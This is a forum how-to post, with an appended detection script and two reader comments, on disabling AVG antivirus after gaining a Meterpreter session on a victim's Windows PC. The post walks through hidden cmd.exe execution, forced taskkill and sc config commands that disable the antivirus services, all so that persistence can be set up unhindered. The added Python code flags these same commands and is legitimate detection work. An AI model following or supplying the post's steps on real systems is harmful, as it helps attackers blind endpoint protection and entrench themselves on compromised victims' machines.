How To: Disable Anti Virus Services After Got Meterpreter Session on Remote PC.

Hello Friends …

My name is Suresh Senarathna and this is my first "How-To" post.
Now I am going to show you how to stop all antivirus services after getting a meterpreter session on your victim.

(I'm using MS Windows XP as my victim OS and AVG Antivirus as the example.)

In a meterpreter session we can use the "killav" command to kill the AVG processes running on the victim's PC, but it will not stop all of AVG's running services.

So we are going to use the "taskkill" command to stop all running AVG services.

1) First type:

execute -f cmd.exe -c -H

in the meterpreter console. It will run a hidden, channelized cmd.exe on the victim OS.

Then type

interact n

(n = the channel number) to interact with it.

2) Then type:

tasklist /SVC | find /I "avg"

to list the running AVG services.

3) After that type:

taskkill /F /IM "avg*"

to kill those running processes.

But as you can see, not all of them are terminated, because some of the services restart themselves and cannot be stopped this way.

4) To verify it, type:

sc queryex (service name)

5) So we have to stop those services from auto-starting. To do that, type:

sc config (service name) start= disabled

(note the space after "start=", sc needs it)

6) Then run taskkill again:

taskkill /F /IM "avg*"

7) Finally type:

tasklist /SVC | find /I "avg"

to verify that all AVG services are terminated.

Now all the running and auto-starting AVG services are terminated.

So you can set up persistence or do any other fun things without the antivirus guard getting in the way.

(P.S.: If I have done anything the wrong way, please correct me. Thanks for reading.)
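Seen from the defending side, steps 3 and 5 leave a recognisable pattern in process-creation telemetry: a forced taskkill against a security product's image name, followed by sc config setting its service to start= disabled. The following is an added example, not part of the original post: a small Python rule set that flags both commands over constructed sample events; the AV name list and the service name "avgwd" are assumptions, not verified AVG identifiers.

```python
import re
from typing import Dict, List, Optional, Tuple
# Constructed sample process-creation events, shaped like Sysmon Event ID 1 /
# Security 4688 records; not telemetry from any real host, and "avgwd" is a
# placeholder service name, not a verified AVG service.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\tasklist.exe", "CommandLine": "tasklist /SVC"},
    {"Image": r"C:\Windows\System32\taskkill.exe", "CommandLine": 'taskkill /F /IM "avg*"'},
    {"Image": r"C:\Windows\System32\sc.exe", "CommandLine": "sc config avgwd start= disabled"},
    {"Image": r"C:\Windows\System32\taskkill.exe", "CommandLine": "taskkill /F /IM notepad.exe"},
    {"Image": r"C:\Windows\System32\sc.exe", "CommandLine": "sc queryex avgwd"},
]
# Name fragments of the security products you run: AVG is the post's example, the
# rest is an assumed starter list to replace with your own estate's process/service names.
AV_NAMES = re.compile(r"avg|msmpeng|windefend", re.IGNORECASE)
# taskkill with the /F (force) switch and an /IM <image name> argument, in any order
TASKKILL_RE = re.compile(r'^\s*taskkill(?:\.exe)?\b(?=.*\s/F\b).*\s/IM\s+"?([^"\s]+)"?', re.I)
# sc config <service> start= disabled (sc accepts the space after '=')
SC_DISABLE_RE = re.compile(r"^\s*sc(?:\.exe)?\s+config\s+(\S+)\s+start\s*=\s*disabled\b", re.I)


def classify(cmdline: str) -> Optional[str]:
    """Return the rule name a single command line triggers, or None."""
    m = TASKKILL_RE.match(cmdline)
    if m and AV_NAMES.search(m.group(1)):
        return "taskkill_force_av_process"
    m = SC_DISABLE_RE.match(cmdline)
    if m and AV_NAMES.search(m.group(1)):
        return "sc_disable_av_service"
    return None


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Run each event's CommandLine through the rules; return (rule, cmdline) hits."""
    hits = []
    for ev in events:
        rule = classify(ev["CommandLine"])
        if rule:
            hits.append((rule, ev["CommandLine"]))
    return hits


def severity(hits: List[Tuple[str, str]]) -> str:
    """A forced kill alone is suspicious; kill plus disabled autostart is the full
    tampering sequence the post walks through, so rate that combination higher."""
    rules = {rule for rule, _ in hits}
    if {"taskkill_force_av_process", "sc_disable_av_service"} <= rules:
        return "high"
    return "medium" if rules else "none"
```

Feeding real Sysmon or 4688 command lines through detect() instead of SAMPLE_EVENTS gives the same verdicts; a "high" result on one host within a short window is worth an immediate look.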



You... don't need admin privileges?

When he launched the cmd.exe, it's pointing directly into windows/system32, so I think he used a high-integrity process meterpreter.
